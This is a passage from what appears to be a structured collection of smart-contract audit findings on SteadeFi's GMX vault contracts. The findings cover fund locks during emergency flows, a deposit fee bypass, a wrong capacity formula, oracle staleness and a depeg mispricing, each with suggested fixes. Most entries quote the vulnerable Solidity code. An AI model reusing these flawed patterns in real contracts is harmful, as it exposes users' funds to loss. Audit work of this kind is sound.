self.tokenB.balanceOf(address(self.trove))\\n );\\n }\\n // rest of code\\n GMXChecks.beforeCompoundChecks(self);\\n // rest of code\\n}\\n```\\n\\nThis function reverts if the current status of the system is not Open or Compound_Failed:\\n```\\nfunction beforeCompoundChecks(\\n GMXTypes.Store storage self\\n) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Compound_Failed\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n // rest of code\\n}\\n```\\n\\nAs the emergency close flow updates this status to Paused and later to Closed, calling compound will revert:\\n```\\nfunction emergencyPause(\\n GMXTypes.Store storage self\\n) external {\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n emit EmergencyPause();\\n}\\n```\\n\\n```\\nfunction emergencyClose(\\n GMXTypes.Store storage self,\\n uint256 deadline\\n) external {\\n GMXChecks.beforeEmergencyCloseChecks(self);\\n\\n // Repay all borrowed assets; 1e18 == 100% shareRatio to repay\\n GMXTypes.RepayParams memory _rp;\\n (\\n _rp.repayTokenAAmt,\\n _rp.repayTokenBAmt\\n ) = GMXManager.calcRepay(self, 1e18);\\n\\n (\\n bool _swapNeeded,\\n address _tokenFrom,\\n address _tokenTo,\\n uint256 _tokenToAmt\\n ) = GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = deadline;\\n\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n\\n GMXManager.repay(\\n self,\\n _rp.repayTokenAAmt,\\n _rp.repayTokenBAmt\\n );\\n\\n self.status = GMXTypes.Status.Closed;\\n\\n emit EmergencyClose(\\n _rp.repayTokenAAmt,\\n _rp.repayTokenBAmt\\n );\\n}\\n```\\n\\nAs we can see, during this process the funds inside the trove contract are never claimed, and as the strategy vault is the only address that can claim the funds of the trove, all funds are gone.\\n```\\ncontract GMXTrove {\\n\\n /* ==================== STATE VARIABLES ==================== */\\n\\n // Address of the vault this trove handler is for\\n IGMXVault public vault;\\n\\n /* ====================== CONSTRUCTOR ====================== */\\n\\n /**\\n * @notice Initialize trove contract with associated vault address\\n * @param _vault Address of vault\\n */\\n constructor (address _vault) {\\n vault = IGMXVault(_vault);\\n\\n GMXTypes.Store memory _store = vault.store();\\n\\n // Set token approvals for this trove's vault contract\\n _store.tokenA.approve(address(vault), type(uint256).max);\\n _store.tokenB.approve(address(vault), type(uint256).max);\\n }\\n}\\n```\\n
Transfer the funds inside the trove into the vault during the emergency close process.
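A minimal sketch of the fix, mirroring the sweep that `compound()` already performs (the exact placement inside `emergencyClose`, before `calcRepay`, is an assumption; the trove's constructor approvals shown above make the `safeTransferFrom` calls possible):\\n```\\n// In GMXEmergency.emergencyClose(): pull any yield parked in the trove back into the vault\\n// before the repayment amounts are calculated, so it is included in the final accounting\\nif (self.tokenA.balanceOf(address(self.trove)) > 0) {\\n self.tokenA.safeTransferFrom(\\n address(self.trove),\\n address(this),\\n self.tokenA.balanceOf(address(self.trove))\\n );\\n}\\nif (self.tokenB.balanceOf(address(self.trove)) > 0) {\\n self.tokenB.safeTransferFrom(\\n address(self.trove),\\n address(this),\\n self.tokenB.balanceOf(address(self.trove))\\n );\\n}\\n```\\n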
If a strategy vault is closed, all funds in the trove are lost.
```\\nfunction deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being considered as part of depositor's assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n // rest of code\\n}\\n```\\n
emergencyResume does not handle the afterDepositCancellation case correctly
medium
The `emergencyResume` function is intended to recover the vault's liquidity following an `emergencyPause`. It operates under the assumption of a successful deposit call. However, if the deposit call is cancelled by GMX, the `emergencyResume` function does not account for this scenario, potentially locking funds.\\nWhen `emergencyResume` is invoked, it sets the vault's status to "Resume" and deposits all LP tokens back into the pool. The function is designed to execute when the vault status is "Paused" and can be triggered by an approved keeper.\\n```\\nfunction emergencyResume(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n\\nShould the deposit fail, the callback contract's `afterDepositCancellation` is expected to revert, which does not impact the continuation of the GMX execution. After the cancellation occurs, the vault status is "Resume", and the liquidity is not re-added to the pool.\\n```\\nfunction afterDepositCancellation(\\n bytes32 depositKey,\\n IDeposit.Props memory /* depositProps */,\\n IEvent.Props memory /* eventData */\\n ) external onlyController {\\n GMXTypes.Store memory _store = vault.store();\\n\\n if (_store.status == GMXTypes.Status.Deposit) {\\n if (_store.depositCache.depositKey == depositKey)\\n vault.processDepositCancellation();\\n } else if (_store.status == GMXTypes.Status.Rebalance_Add) {\\n if (_store.rebalanceCache.depositKey == depositKey)\\n vault.processRebalanceAddCancellation();\\n } else if (_store.status == GMXTypes.Status.Compound) {\\n if (_store.compoundCache.depositKey == depositKey)\\n vault.processCompoundCancellation();\\n } else {\\n revert Errors.DepositCancellationCallback();\\n }\\n }\\n```\\n\\nGiven this, another attempt to execute `emergencyResume` will fail because the vault status is not "Paused".\\n```\\nfunction beforeEmergencyResumeChecks (\\n GMXTypes.Store storage self\\n ) external view {\\n if (self.status != GMXTypes.Status.Paused)\\n revert Errors.NotAllowedInCurrentVaultStatus();\\n }\\n```\\n\\nIn this state, an attempt to revert to "Paused" status via `emergencyPause` could fail in GMXManager.removeLiquidity, as there are no tokens to send back to the GMX pool, leading to a potential fund lock within the contract.
To address this issue, handle the afterDepositCancellation case correctly by allowing emergencyResume to be called again.
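One possible shape of the fix in the callback (the `Resume` branch and the `processEmergencyResumeCancellation` handler are hypothetical additions, not existing code):\\n```\\n// In GMXCallback.afterDepositCancellation()\\n} else if (_store.status == GMXTypes.Status.Resume) {\\n // hypothetical handler: resets status back to Paused so that\\n // emergencyResume can be called again with the returned tokens\\n vault.processEmergencyResumeCancellation();\\n} else {\\n revert Errors.DepositCancellationCallback();\\n}\\n```\\n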
The current implementation may result in funds being irretrievably locked within the contract.
```\\nfunction emergencyResume(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n
A depositor of the GMXVault can bypass paying the fee when depositing into the GMXVault.
medium
The fee minted in the form of shares (svTokens) is not subtracted from the amount of shares (svTokens) minted to the GMXVault's depositor.\\nBecause of this, a depositor of the GMXVault receives an amount of shares (svTokens) from which the fee minted via GMXVault#mintFee() was never deducted.\\nThis means that a depositor of the GMXVault can bypass paying the fee when depositing into the GMXVault.\\nWithin GMXDeposit#deposit(), GMXVault#mintFee() is called to mint the fee in the form of svTokens like this: https://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXDeposit.sol#L119\\n```\\n /**\\n * @notice @inheritdoc GMXVault\\n * @param self GMXTypes.Store\\n * @param isNative Boolean as to whether user is depositing native asset (e.g. ETH, AVAX, etc.)\\n */\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n // rest of code\\n self.status = GMXTypes.Status.Deposit;\\n\\n self.vault.mintFee(); ///<----------------------- @audit\\n // rest of code\\n```\\n\\nWithin GMXVault#mintFee(), the amount (GMXReader.pendingFee(_store)) of shares is minted to the treasury (_store.treasury) in the form of svTokens like this: https://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXVault.sol#L335\\n```\\n /**\\n * @notice Mint vault token shares as management fees to protocol treasury\\n */\\n function mintFee() public {\\n _mint(_store.treasury, GMXReader.pendingFee(_store)); ///<------------ @audit\\n _store.lastFeeCollected = block.timestamp;\\n }\\n```\\n\\nIn the deposit callback, GMXDeposit#processDeposit() is called via GMXVault#deposit().\\nWithin GMXDeposit#processDeposit(), the amount (self.depositCache.sharesToUser) of shares (VaultTokens) is minted to the GMXVault's depositor (self.depositCache.user) like this: https://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXDeposit.sol#L172\\n```\\n /**\\n * @notice @inheritdoc GMXVault\\n * @param self GMXTypes.Store\\n */\\n function processDeposit(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeProcessDepositChecks(self);\\n\\n // We transfer the core logic of this function to GMXProcessDeposit.processDeposit()\\n // to allow try/catch here to catch for any issues or any checks in afterDepositChecks() failing.\\n // If there are any issues, a DepositFailed event will be emitted and processDepositFailure()\\n // should be triggered to refund assets accordingly and reset the vault status to Open again.\\n try GMXProcessDeposit.processDeposit(self) {\\n // Mint shares to depositor\\n self.vault.mint(self.depositCache.user, self.depositCache.sharesToUser); ///<------------- @audit\\n // rest of code\\n```\\n\\nThe fee already minted via GMXVault#mintFee() is supposed to be subtracted from the amount of shares minted to the depositor in GMXDeposit#processDeposit(). However, there is no logic that performs this subtraction.
Within GMXDeposit#processDeposit(), consider subtracting the amount of fee shares (svTokens) minted via GMXVault#mintFee() from the amount of shares minted to the depositor.
The depositor receives an amount of shares (svTokens) from which the fee minted via GMXVault#mintFee() was never deducted.\\nThis means that a depositor of the GMXVault can bypass paying the fee when depositing into the GMXVault.
```\\n /**\\n * @notice @inheritdoc GMXVault\\n * @param self GMXTypes.Store\\n * @param isNative Boolean as to whether user is depositing native asset (e.g. ETH, AVAX, etc.)\\n */\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n // rest of code\\n self.status = GMXTypes.Status.Deposit;\\n\\n self.vault.mintFee(); ///<----------------------- @audit\\n // rest of code\\n```\\n
Incorrect depositable shortToken amount calculation in Delta neutral vaults
medium
When calculating the maximum possible depositable amount for delta neutral vaults, `_maxTokenBLending` is calculated incorrectly.\\n```\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n (uint256 _tokenAWeight, ) = tokenWeights(self);\\n\\n\\n uint256 _maxTokenALending = convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenALendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER);\\n\\n\\n uint256 _maxTokenBLending = convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenBLendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER)\\n - 1e18;\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXReader.sol#L254-L270\\nIf a user wants to deposit value `v` into an `l`-leveraged delta neutral vault where the tokens have weights `a` and `b`, the required lending amounts are derived as follows:\\n```\\nTotal value to deposit to GMX = lv\\nValue of tokens to short = lva\\nHence this value will be borrowed from the tokenA lending vault\\nRemaining value to borrow (from tokenB lending vault) = lv - lva - v (deposit value provided by user)\\nHence if there is Tb value of tokens in tokenB lending vault, v <= Tb / (l - la - 1)\\n```\\n
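A worked check with assumed numbers shows the gap between the implemented formula and the derivation above:\\n```\\nl = 3, tokenA weight a = 0.5, value in tokenB lending vault = Tb\\ncorrect: v <= Tb / (l - l*a - 1) = Tb / 0.5 = 2 * Tb\\nimplemented: v <= Tb / (l * a) - 1 = Tb / 1.5 - 1 (~0.67 * Tb)\\n```\\nDeposits between roughly 0.67 * Tb and 2 * Tb are therefore rejected even though the lending vault could support them.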
Change the formula to the correct one.\\n```diff\\ndiff --git a/contracts/strategy/gmx/GMXReader.sol b/contracts/strategy/gmx/GMXReader.sol\\nindex 73bb111..ae819c4 100644\\n--- a/contracts/strategy/gmx/GMXReader.sol\\n+++ b/contracts/strategy/gmx/GMXReader.sol\\n@@ -266,8 +266,7 @@ library GMXReader {\\n       address(self.tokenB),\\n       self.tokenBLendingVault.totalAvailableAsset()\\n     ) * SAFE_MULTIPLIER\\n-      / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER)\\n-      - 1e18;\\n+      / (self.leverage - (self.leverage * _tokenAWeight / SAFE_MULTIPLIER) - 1e18);\\n \\n     _additionalCapacity = _maxTokenALending > _maxTokenBLending ? _maxTokenBLending : _maxTokenALending;\\n   }\\n```\\n
Deposit attempts can revert even when there is enough tokens to lend causing inefficiency, loss of gas for depositors and deviation from the protocol specification.
```\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n (uint256 _tokenAWeight, ) = tokenWeights(self);\\n\\n\\n uint256 _maxTokenALending = convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenALendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER);\\n\\n\\n uint256 _maxTokenBLending = convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenBLendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER)\\n - 1e18;\\n```\\n
GMXOracle.sol#L280: function `getLpTokenAmount` incorrectly assumes that the returned amount is in 18 decimal places, when it is actually in 30 decimal places.
low
The `GMXOracle` contract has a function `getLpTokenAmount`, which is in scope. It is used in the keeper script to calculate how many LP tokens correspond to a given USD value.\\nThis function returns the `lpTokenAmount` with 30 decimal places instead of the 18 its documentation assumes.\\nLet's look at the function `getLpTokenAmount`:\\n```\\n /**\\n * @notice Get token A and token B's LP token amount required for a given value\\n * @param givenValue Given value needed, expressed in 1e30 -------------------------- refer this\\n * @param marketToken LP token address\\n * @param indexToken Index token address\\n * @param longToken Long token address\\n * @param shortToken Short token address\\n * @param isDeposit Boolean for deposit or withdrawal\\n * @param maximize Boolean for minimum or maximum price\\n * @return lpTokenAmount Amount of LP tokens; expressed in 1e18 --------------> refer this\\n */\\n function getLpTokenAmount(\\n uint256 givenValue,\\n address marketToken,\\n address indexToken,\\n address longToken,\\n address shortToken,\\n bool isDeposit,\\n bool maximize\\n ) public view returns (uint256) {\\n uint256 _lpTokenValue = getLpTokenValue(\\n marketToken,\\n indexToken,\\n longToken,\\n shortToken,\\n isDeposit,\\n maximize\\n );\\n\\n\\n return givenValue * SAFE_MULTIPLIER / _lpTokenValue;\\n }\\n```\\n\\nSAFE_MULTIPLIER is in 18 decimal places.\\nThe value returned from `getLpTokenValue` (`_lpTokenValue`) is in 18 decimal places. Refer the line\\nSo the final value returned from `getLpTokenAmount` is (1e30 * 1e18) / 1e18 = 1e30, i.e. 30 decimal places instead of the documented 18.
Update the function `getLpTokenAmount` as shown below.\\n```diff\\n function getLpTokenAmount(\\n uint256 givenValue,\\n address marketToken,\\n address indexToken,\\n address longToken,\\n address shortToken,\\n bool isDeposit,\\n bool maximize\\n ) public view returns (uint256) {\\n uint256 _lpTokenValue = getLpTokenValue(\\n marketToken,\\n indexToken,\\n longToken,\\n shortToken,\\n isDeposit,\\n maximize\\n );\\n\\n- return givenValue * SAFE_MULTIPLIER / _lpTokenValue;\\n+ return (givenValue * SAFE_MULTIPLIER) / (_lpTokenValue * 1e12);\\n }\\n```\\n
Overestimating the lpToken amount for the given USD value.
```\\n /**\\n * @notice Get token A and token B's LP token amount required for a given value\\n * @param givenValue Given value needed, expressed in 1e30 -------------------------- refer this\\n * @param marketToken LP token address\\n * @param indexToken Index token address\\n * @param longToken Long token address\\n * @param shortToken Short token address\\n * @param isDeposit Boolean for deposit or withdrawal\\n * @param maximize Boolean for minimum or maximum price\\n * @return lpTokenAmount Amount of LP tokens; expressed in 1e18 --------------> refer this\\n */\\n function getLpTokenAmount(\\n uint256 givenValue,\\n address marketToken,\\n address indexToken,\\n address longToken,\\n address shortToken,\\n bool isDeposit,\\n bool maximize\\n ) public view returns (uint256) {\\n uint256 _lpTokenValue = getLpTokenValue(\\n marketToken,\\n indexToken,\\n longToken,\\n shortToken,\\n isDeposit,\\n maximize\\n );\\n\\n\\n return givenValue * SAFE_MULTIPLIER / _lpTokenValue;\\n }\\n```\\n
`Chainlink.latestRoundData()` may return stale results
low
The `_getChainlinkResponse()` function is used to get the price of tokens; the problem is that the function does not check for stale results.\\nThe `ChainlinkOracle._getChainlinkResponse()` function is used to get the latest Chainlink response.\\n```\\nfunction _getChainlinkResponse(address _feed) internal view returns (ChainlinkResponse memory) {\\n ChainlinkResponse memory _chainlinkResponse;\\n\\n _chainlinkResponse.decimals = AggregatorV3Interface(_feed).decimals();\\n\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n\\n _chainlinkResponse.roundId = _latestRoundId;\\n _chainlinkResponse.answer = _latestAnswer;\\n _chainlinkResponse.timestamp = _latestTimestamp;\\n _chainlinkResponse.success = true;\\n\\n return _chainlinkResponse;\\n }\\n```\\n\\nThere is no check for stale data, and there are several reasons a price feed can become stale.
Read the `updatedAt` return value from the `Chainlink.latestRoundData()` function and verify that it is not older than a specific time tolerance.\\n```\\nrequire(block.timestamp - updatedAt < toleranceTime, "stale price");\\n```\\n
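A sketch of how this could look inside `_getChainlinkResponse` (the `toleranceTime` heartbeat value and the `StalePriceFeed` error are assumed additions):\\n```\\n(\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n) = AggregatorV3Interface(_feed).latestRoundData();\\n\\n// reject answers older than the feed's expected heartbeat, e.g. 1 hours for most feeds\\nif (block.timestamp - _latestTimestamp >= toleranceTime) revert Errors.StalePriceFeed();\\n```\\n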
Since the token prices are used in many contracts, stale data could be catastrophic for the project.
```\\nfunction _getChainlinkResponse(address _feed) internal view returns (ChainlinkResponse memory) {\\n ChainlinkResponse memory _chainlinkResponse;\\n\\n _chainlinkResponse.decimals = AggregatorV3Interface(_feed).decimals();\\n\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n\\n _chainlinkResponse.roundId = _latestRoundId;\\n _chainlinkResponse.answer = _latestAnswer;\\n _chainlinkResponse.timestamp = _latestTimestamp;\\n _chainlinkResponse.success = true;\\n\\n return _chainlinkResponse;\\n }\\n```\\n
USDC is not valued correctly in case of a depeg, which causes a loss of funds
low
USDC is not valued correctly in case of a depeg, which causes a loss of funds.\\nThe protocol uses a Chainlink feed to get the price of a specific token; in this case the token of interest is the stablecoin USDC. For context, the GMX V2 documentation reads:\\nIn case the price of a stablecoin depegs from 1 USD: To ensure that profits for all short positions can always be fully paid out, the contracts will pay out profits in the stablecoin based on a price of 1 USD or the current Chainlink price for the stablecoin, whichever is higher. For swaps using the depegged stablecoin, a spread from 1 USD to the Chainlink price of the stablecoin will apply. If Chainlink Data Stream prices are used then the spread would be from the data stream and may not be to 1 USD.\\nhttps://gmx-docs.io/docs/trading/v2\\nFrom the above snippet we know that GMX will never value USDC below $1 when closing a short or withdrawing from a position, and that for swaps a spread from 1 USD to the Chainlink price applies. The problem is that Steadefi does not account for this and continues to use the Chainlink price of USDC in a withdraw-and-swap when calculating the appropriate slippage amount. Let me demonstrate.\\n```\\nfunction consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = _getPrevChainlinkResponse(_feed, chainlinkResponse.roundId);\\n\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n\\nHere consult calls `_getChainlinkResponse(_feed)`, which gets the current value of a token, for our purposes USDC. The problem begins because consult is called by `consultIn18Decimals`, which is called by `convertToUsdValue`, which is in turn called by `calcMinTokensSlippageAmt`. This function decides how much slippage is appropriate given the value of the asset being withdrawn. As shown, it will use the Chainlink value of USDC, and in case of a depeg it will use the depegged value. But per the GMX docs, on withdrawal USDC will always be valued at $1 or higher. So the slippage tolerance is calculated against a depegged USDC value while the withdrawal on GMX values USDC at its normal pegged value.\\nFor example\\nthere is a depeg of USDC\\nUSDC Chainlink value is $0.4\\nGMX withdraw value is always $1\\nBecause the Chainlink value is used to calculate the slippage tolerance, the tolerance corresponds to a USDC price of $0.4 while GMX values USDC at $1. The amount of slippage allowed will be very incorrect and in some cases extreme. In case of a total depeg, the tolerated slippage approaches 99% and users may lose almost all of their funds when trying to withdraw.
Implement logic specific to stablecoins to handle depeg events, such as always valuing a stablecoin at the maximum of its pegged value ($1) and the Chainlink response value. Currently only the Chainlink response answer is used to value stablecoins like USDC, and as explained above this is a problem.
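A minimal sketch of such a floor inside `consult()` (the `isStable` mapping is an assumed addition; $1 is expressed in the feed's own decimals):\\n```\\nint256 _answer = chainlinkResponse.answer;\\nuint8 _decimals = chainlinkResponse.decimals;\\n\\nif (isStable[token]) {\\n int256 _onePeg = int256(10 ** uint256(_decimals)); // $1 in feed decimals\\n // mirror GMX, which values depegged stablecoins at max(feed price, $1) on withdrawals\\n if (_answer < _onePeg) _answer = _onePeg;\\n}\\n\\nreturn (_answer, _decimals);\\n```\\n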
In case of total depeg, slippage will be almost 99% and users may lose almost all of their funds when trying to withdraw.
```\\nfunction consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = _getPrevChainlinkResponse(_feed, chainlinkResponse.roundId);\\n\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n
Depositing to the GMX pool returns sub-optimal value if the pool is imbalanced
medium
Whenever a user deposits tokens into the vault, the vault creates a leveraged position (delta long or delta neutral) in the GMX pool. Performing a proportional deposit is not optimal in every case, and depositing this way into an imbalanced pool results in fewer LP tokens due to a sub-optimal trade, eventually leading to a loss of gain for the strategy vault.\\nAlice deposits tokenA into the vault to open a Delta.Neutral position\\n```\\nFile: GMXVault.sol\\n\\n function deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n```\\n\\nThe vault delegates to the GMXDeposit library to execute the further logic\\n```\\nFile: GMXDeposit.sol\\n\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n[// rest of code// rest of code// rest of code// rest of code// rest of code.]\\n // Borrow assets and create deposit in GMX\\n (\\n uint256 _borrowTokenAAmt,\\n uint256 _borrowTokenBAmt\\n ) = GMXManager.calcBorrow(self, _dc.depositValue);\\n\\n [// rest of code// rest of code// rest of code]\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXDeposit.sol#L54\\nwhich calls calcBorrow on the GMXManager library to borrow assets and open the position in the GMX pool\\n```\\nFile: GMXManager.sol\\n\\n /**\\n * @notice Calculate amount of tokenA and tokenB to borrow\\n * @param self GMXTypes.Store\\n * @param depositValue USD value in 1e18\\n */\\n function calcBorrow(\\n GMXTypes.Store storage self,\\n uint256 depositValue\\n ) external view returns (uint256, uint256) {\\n // Calculate final position value based on deposit value\\n uint256 _positionValue = depositValue * self.leverage / SAFE_MULTIPLIER;\\n\\n // Obtain the value to borrow\\n uint256 _borrowValue = _positionValue - depositValue;\\n\\n uint256 _tokenADecimals = IERC20Metadata(address(self.tokenA)).decimals();\\n uint256 _tokenBDecimals = IERC20Metadata(address(self.tokenB)).decimals();\\n uint256 _borrowLongTokenAmt;\\n uint256 _borrowShortTokenAmt;\\n\\n [// rest of code// rest of code// rest of code// rest of code// rest of code// rest of code..]\\n\\n // If delta is neutral, borrow appropriate amount in long token to hedge, and the rest in short token\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n // Get token weights in LP, e.g. 50% = 5e17\\n (uint256 _tokenAWeight,) = GMXReader.tokenWeights(self);\\n\\n // Get value of long token (typically tokenA)\\n uint256 _longTokenWeightedValue = _tokenAWeight * _positionValue / SAFE_MULTIPLIER;\\n\\n // Borrow appropriate amount in long token to hedge\\n _borrowLongTokenAmt = _longTokenWeightedValue * SAFE_MULTIPLIER\\n / GMXReader.convertToUsdValue(self, address(self.tokenA), 10**(_tokenADecimals))\\n / (10 ** (18 - _tokenADecimals));\\n\\n // Borrow the shortfall value in short token\\n _borrowShortTokenAmt = (_borrowValue - _longTokenWeightedValue) * SAFE_MULTIPLIER\\n / GMXReader.convertToUsdValue(self, address(self.tokenB), 10**(_tokenBDecimals))\\n / (10 ** (18 - _tokenBDecimals));\\n }\\n[// rest of code// rest of code// rest of code// rest of code// rest of code// rest of code// rest of code]\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXManager.sol#L70\\nHere it considers the current reserve ratio of the pool and deposits in the same ratio.\\nThe GMX docs clearly state that deposits which rebalance the pool (i.e. move the actual weight of the index token towards the TOKEN_WEIGHT defined for the pool) receive a benefit, technically more LP tokens, while deposits that further imbalance the pool's reserve ratio receive fewer LP tokens. Reference\\nEven Curve pools work in the same way: depositors get a benefit if they help balance the pool reserves.
Consider checking the pool's current token weights and, if the pool is imbalanced, skewing the deposit (the leveraged position) towards restoring the index token's target weight; this yields optimal returns (extra LP tokens).
The weight of the index token will not always be near the pool's defined target weight. So when the pool is imbalanced, depositing into the GMX pool proportionally does not give optimal returns (it mints fewer LP tokens), eventually leading to a loss of gain for the depositors and affecting net APR.
```\\nFile: GMXVault.sol\\n\\n function deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n```\\n
The `svTokenValue` function can return overestimated value of each strategy vault share token
medium
The `GMXReader.svTokenValue` function can return an overestimated value for each strategy vault share token because it uses an outdated `totalSupply`, i.e. one that excludes management fees that have been pending for a long period. This can cause unexpected protocol behavior when keepers rebalance and when other protocols read the share value.\\nThe `svTokenValue` function calculates the value of each strategy vault share token with the current `totalSupply`, which may not include pending management fees:\\n```\\n function svTokenValue(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 equityValue_ = equityValue(self);\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n if (equityValue_ == 0 || totalSupply_ == 0) return SAFE_MULTIPLIER;\\n return equityValue_ * SAFE_MULTIPLIER / totalSupply_;\\n }\\n```\\n\\nSo the returned share value will be overestimated; the longer the period since `mintFee` was last called, the more overestimated the share value is.
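A worked example with assumed numbers:\\n```\\nequityValue_ = 110e18, totalSupply_ = 100e18, pendingFee = 10e18 shares\\nreported: 110e18 * 1e18 / 100e18 = 1.10e18 per share\\nactual: 110e18 * 1e18 / (100e18 + 10e18) = 1.00e18 per share once mintFee() is called\\n```\\n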
Consider adding `pendingFee` to the totalSupply:\\n```diff\\n function svTokenValue(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 equityValue_ = equityValue(self);\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n if (equityValue_ == 0 || totalSupply_ == 0) return SAFE_MULTIPLIER;\\n- return equityValue_ * SAFE_MULTIPLIER / totalSupply_;\\n+ return equityValue_ * SAFE_MULTIPLIER / (totalSupply_ + pendingFee(self));\\n } \\n```\\n
The `GMXReader.svTokenValue` function returns an overestimated value of the share token. This issue can cause the protocol unexpected behavior while keepers provide rebalance and when other protocols receive information about the shares value.\\nTools used\\nManual Review
